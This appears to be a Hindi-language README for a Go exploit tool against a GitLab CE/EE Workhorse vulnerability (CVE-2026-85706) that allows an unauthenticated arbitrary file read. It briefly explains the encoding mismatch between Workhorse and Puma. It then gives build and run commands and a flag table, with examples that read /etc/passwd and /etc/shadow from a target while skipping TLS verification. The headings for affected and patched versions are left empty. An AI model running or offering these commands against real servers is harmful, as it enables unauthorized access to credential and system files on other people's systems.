
CVE-2026-85706 के लिए Go exploit, GitLab CE/EE Workhorse में URL-encoding bypass के माध्यम से unauthenticated arbitrary file read, concurrent requests और TLS skip के साथ।
GitLab CE/EE अनधिकृत मनमाना फ़ाइल पठन भेद्यता (CVE-2026-85706)।
प्रभावित संस्करण:
पैच किए गए संस्करण:
यह भेद्यता GitLab के Workhorse घटक में मौजूद है। Workhorse regex एक एन्कोडेड पथ देखता है, जबकि Puma इसे डिकोड करता है। Rails File.open(file.path) को प्रमाणीकरण से पहले कॉल किया जाता है, और urlencoded parse अमान्य %-एन्कोडिंग को 400 बॉडी में इंटरपोलेट करता है, जिससे फ़ाइल सामग्री लीक हो जाती है।
# Build the tool
go build -o CVE-2026-85706 CVE-2026-85706.go
# Run the exploit
./CVE-2026-85706 -u https://gitlab.example.com -f /etc/passwd
| तर्क | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u | लक्ष्य URL (जैसे, https://gitlab.example.com) | - |
-f | पढ़ने के लिए फ़ाइल (जैसे, /etc/passwd) | - |
-k | TLS सत्यापन छोड़ें | false |
-t | समवर्ती थ्रेड्स की संख्या | 1 |
-v | विस्तृत आउटपुट | false |
./CVE-2026-85706 -u https://gitlab.example.com -f /etc/shadow -k
यह लक्ष्य GitLab इंस्टेंस से /etc/shadow फ़ाइल को पढ़ने का प्रयास करेगा, TLS सत्यापन छोड़ते हुए।